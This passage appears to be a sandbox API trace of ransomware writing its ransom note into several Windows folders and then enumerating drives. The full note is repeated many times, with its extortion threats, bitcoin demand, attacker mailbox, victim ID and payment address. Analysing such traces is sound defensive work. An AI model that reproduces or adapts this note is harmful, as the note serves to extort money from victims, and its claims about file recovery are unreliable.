(in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.529] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.529] CloseHandle (hObject=0x414) returned 1 [0124.530] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=6, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Favorites") returned 1 [0124.530] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites" (normalized: "c:\\users\\fd1hvy\\favorites")) returned 0x11 [0124.530] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=6, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Favorites") returned 1 [0124.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\favorites\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.532] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.533] CloseHandle (hObject=0x414) returned 1 [0124.534] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=22, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu") returned 1 [0124.534] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu" (normalized: "c:\\programdata\\microsoft\\windows\\start menu")) returned 0x11 [0124.534] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=22, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu") returned 1 [0124.534] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", lpUsedDefaultChar=0x0) returned 2498 [0124.535] WriteFile (in: hFile=0x414, lpBuffer=0x242ff88*, nNumberOfBytesToWrite=0x9c2, lpNumberOfBytesWritten=0x19fcac, lpOverlapped=0x0 | out: lpBuffer=0x242ff88*, lpNumberOfBytesWritten=0x19fcac*=0x9c2, lpOverlapped=0x0) returned 1 [0124.536] CloseHandle (hObject=0x414) returned 1 [0124.542] GetFileAttributesW (lpFileName="A:\\" (normalized: "a:")) returned 0xffffffff [0124.542] GetLastError () returned 0x3 [0124.547] GetFileAttributesW (lpFileName="B:\\" (normalized: "b:")) returned 0xffffffff [0124.547] GetLastError () returned 0x3 [0124.547] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0124.547] CreateFileW (lpFileName="C:\\\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about 